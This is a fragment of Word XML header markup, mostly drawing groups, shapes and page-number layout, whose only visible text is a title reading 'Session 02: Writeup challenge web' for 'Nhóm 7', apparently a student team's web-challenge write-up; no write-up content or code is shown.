            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="16C1CF27" wp14:editId="2434D952">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>6957434</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="margin">
                <wp:posOffset>-481502</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="578485" cy="1902460"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="103" name="Group 103"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="578485" cy="1902460"/>
                        <a:chOff x="5056750" y="2828750"/>
                        <a:chExt cx="578500" cy="1902500"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wpg:grpSp>
                      <wpg:cNvPr id="1" name="Group 1"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="5056758" y="2828770"/>
                          <a:ext cx="578485" cy="1902460"/>
                          <a:chOff x="5056750" y="2828750"/>
                          <a:chExt cx="578500" cy="1902500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2" name="Rectangle 2"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5056750" y="2828750"/>
                            <a:ext cx="578500" cy="1902500"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0FFF8DD2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                              <w:pPr>
                                <w:spacing w:after="0"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wpg:grpSp>
                        <wpg:cNvPr id="3" name="Group 3"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="5056758" y="2828770"/>
                            <a:ext cx="578485" cy="1902460"/>
                            <a:chOff x="5056750" y="2824000"/>
                            <a:chExt cx="578500" cy="1907250"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="4" name="Rectangle 4"/>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="5056750" y="2824000"/>
                              <a:ext cx="578500" cy="1907250"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="767EC310" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                <w:pPr>
                                  <w:spacing w:after="0"/>
                                  <w:textDirection w:val="btLr"/>
                                </w:pPr>
                              </w:p>
                            </w:txbxContent>
                          </wps:txbx>
                          <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                            <a:noAutofit/>
                          </wps:bodyPr>
                        </wps:wsp>
                        <wpg:grpSp>
                          <wpg:cNvPr id="5" name="Group 5"/>
                          <wpg:cNvGrpSpPr/>
                          <wpg:grpSpPr>
                            <a:xfrm rot="10800000">
                              <a:off x="5056758" y="2828770"/>
                              <a:ext cx="578485" cy="1902460"/>
                              <a:chOff x="13" y="11415"/>
                              <a:chExt cx="1425" cy="2996"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="6" name="Rectangle 6"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="13" y="11415"/>
                                <a:ext cx="1425" cy="2975"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:noFill/>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="5250B657" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wpg:grpSp>
                            <wpg:cNvPr id="7" name="Group 7"/>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm rot="10800000" flipH="1">
                                <a:off x="13" y="14340"/>
                                <a:ext cx="1410" cy="71"/>
                                <a:chOff x="-83" y="540"/>
                                <a:chExt cx="1218" cy="71"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="8" name="Rectangle 8"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="678" y="540"/>
                                  <a:ext cx="457" cy="71"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:solidFill>
                                  <a:srgbClr val="5F497A"/>
                                </a:solidFill>
                                <a:ln w="9525" cap="flat" cmpd="sng">
                                  <a:solidFill>
                                    <a:srgbClr val="5F497A"/>
                                  </a:solidFill>
                                  <a:prstDash val="solid"/>
                                  <a:miter lim="800000"/>
                                  <a:headEnd type="none" w="sm" len="sm"/>
                                  <a:tailEnd type="none" w="sm" len="sm"/>
                                </a:ln>
                              </wps:spPr>
                              <wps:txbx>
                                <w:txbxContent>
                                  <w:p w14:paraId="500220E9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                    <w:pPr>
                                      <w:spacing w:after="0"/>
                                      <w:textDirection w:val="btLr"/>
                                    </w:pPr>
                                  </w:p>
                                </w:txbxContent>
                              </wps:txbx>
                              <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                                <a:noAutofit/>
                              </wps:bodyPr>
                            </wps:wsp>
                            <wps:wsp>
                              <wps:cNvPr id="9" name="Straight Arrow Connector 9"/>
                              <wps:cNvCnPr/>
                              <wps:spPr>
                                <a:xfrm rot="10800000">
                                  <a:off x="-83" y="540"/>
                                  <a:ext cx="761" cy="0"/>
                                </a:xfrm>
                                <a:prstGeom prst="straightConnector1">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:noFill/>
                                <a:ln w="9525" cap="flat" cmpd="sng">
                                  <a:solidFill>
                                    <a:srgbClr val="5F497A"/>
                                  </a:solidFill>
                                  <a:prstDash val="solid"/>
                                  <a:round/>
                                  <a:headEnd type="none" w="sm" len="sm"/>
                                  <a:tailEnd type="none" w="sm" len="sm"/>
                                </a:ln>
                              </wps:spPr>
                              <wps:bodyPr/>
                            </wps:wsp>
                          </wpg:grpSp>
                          <wps:wsp>
                            <wps:cNvPr id="10" name="Rectangle 10"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm rot="-5400000">
                                <a:off x="-481" y="12301"/>
                                <a:ext cx="2805" cy="1033"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="FFFFFF"/>
                              </a:solidFill>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="548F49B8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:jc w:val="right"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                      <w:color w:val="000000"/>
                                      <w:sz w:val="18"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve"> PAGE    \* MERGEFORMAT </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                                      <w:b/>
                                      <w:color w:val="BF8F00"/>
                                      <w:sz w:val="48"/>
                                    </w:rPr>
                                    <w:t>14</w:t>
                                  </w:r>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                        </wpg:grp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6957434</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="margin">
                <wp:posOffset>-481502</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="578485" cy="1902460"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="103" name="image113.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image113.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId1"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="578485" cy="1902460"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:t>Session 0</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:t>Writeup challenge web</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:t xml:space="preserve">Nhóm </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:color w:val="2E75B5"/>
      </w:rPr>
      <w:t>7</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1A81E393" wp14:editId="04044E81">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1587499</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>101600</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="0"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a:off x="4288725" y="3780000"/>
                        <a:ext cx="2114550" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="accent5"/>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-1587499</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>101600</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="0" cy="12700"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="104" name="image114.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image114.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3F6FC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="UTM Neo Sans Intel"/>
        <w:b/>
        <w:noProof/>
        <w:color w:val="A6A6A6"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4A2E6538" wp14:editId="70EE0369">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>104775</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>19050</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2983965" cy="2403652"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="108" name="Group 108"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2983965" cy="2403652"/>
                        <a:chOff x="3854000" y="2578150"/>
                        <a:chExt cx="2984000" cy="2403700"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wpg:grpSp>
                      <wpg:cNvPr id="11" name="Group 11"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="3854018" y="2578174"/>
                          <a:ext cx="2983965" cy="2403652"/>
                          <a:chOff x="3854000" y="2578150"/>
                          <a:chExt cx="2984000" cy="2403700"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="12" name="Rectangle 12"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3854000" y="2578150"/>
                            <a:ext cx="2984000" cy="2403700"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1FDE7A3F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                              <w:pPr>
                                <w:spacing w:after="0"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wpg:grpSp>
                        <wpg:cNvPr id="13" name="Group 13"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3854018" y="2578174"/>
                            <a:ext cx="2983965" cy="2403652"/>
                            <a:chOff x="3854000" y="2578150"/>
                            <a:chExt cx="2984000" cy="2403700"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="14" name="Rectangle 14"/>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="3854000" y="2578150"/>
                              <a:ext cx="2984000" cy="2403700"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln>
                              <a:noFill/>
                            </a:ln>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="079F5B10" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                <w:pPr>
                                  <w:spacing w:after="0"/>
                                  <w:textDirection w:val="btLr"/>
                                </w:pPr>
                              </w:p>
                            </w:txbxContent>
                          </wps:txbx>
                          <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                            <a:noAutofit/>
                          </wps:bodyPr>
                        </wps:wsp>
                        <wpg:grpSp>
                          <wpg:cNvPr id="15" name="Group 15"/>
                          <wpg:cNvGrpSpPr/>
                          <wpg:grpSpPr>
                            <a:xfrm>
                              <a:off x="3854018" y="2578174"/>
                              <a:ext cx="2983965" cy="2403652"/>
                              <a:chOff x="1089084" y="1086011"/>
                              <a:chExt cx="29837" cy="24035"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="16" name="Rectangle 16"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1089084" y="1086011"/>
                                <a:ext cx="29825" cy="24025"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:noFill/>
                              <a:ln>
                                <a:noFill/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="3685DA50" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="17" name="Freeform: Shape 17"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1115446" y="1086999"/>
                                <a:ext cx="3475" cy="3028"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="347459" h="302832" extrusionOk="0">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wps:spPr>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="18" name="Freeform: Shape 18"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1091220" y="1106954"/>
                                <a:ext cx="3570" cy="3092"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="357022" h="309207" extrusionOk="0">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wps:spPr>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="19" name="Freeform: Shape 19"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1110091" y="1087190"/>
                                <a:ext cx="2996" cy="4336"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="299644" h="433527" extrusionOk="0">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wps:spPr>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="20" name="Freeform: Shape 20"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1098264" y="1094968"/>
                                <a:ext cx="2965" cy="2997"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="93" h="94" extrusionOk="0">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wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="6734B7EB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="21" name="Freeform: Shape 21"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1107891" y="1086011"/>
                                <a:ext cx="7428" cy="6439"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="233" h="202" extrusionOk="0">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wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="1F698D6C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="22" name="Freeform: Shape 22"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1102122" y="1089836"/>
                                <a:ext cx="7108" cy="6184"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="710857" h="618413" extrusionOk="0">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wps:spPr>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="23" name="Freeform: Shape 23"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1096001" y="1093279"/>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14:paraId="0B893FFF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="24" name="Freeform: Shape 24"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1096001" y="1086234"/>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14:paraId="6D32F2FB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="25" name="Freeform: Shape 25"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1105245" y="1091621"/>
                                <a:ext cx="2838" cy="1530"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="89" h="48" extrusionOk="0">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wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="6800AC80" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="26" name="Freeform: Shape 26"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1103269" y="1092514"/>
                                <a:ext cx="3252" cy="1721"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="102" h="54" extrusionOk="0">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wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="3843AC28" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
                            <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                              <a:noAutofit/>
                            </wps:bodyPr>
                          </wps:wsp>
                          <wps:wsp>
                            <wps:cNvPr id="27" name="Freeform: Shape 27"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="1089084" y="1094076"/>
                                <a:ext cx="8383" cy="12336"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst/>
                                <a:ahLst/>
                                <a:cxnLst/>
                                <a:rect l="l" t="t" r="r" b="b"/>
                                <a:pathLst>
                                  <a:path w="263" h="387" extrusionOk="0">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wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="35804268" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                                  <w:pPr>
                                    <w:spacing w:after="0"/>
                                    <w:textDirection w:val="btLr"/>
                                  </w:pPr>
                                </w:p>
                              </w:txbxContent>
                            </wps:txbx>
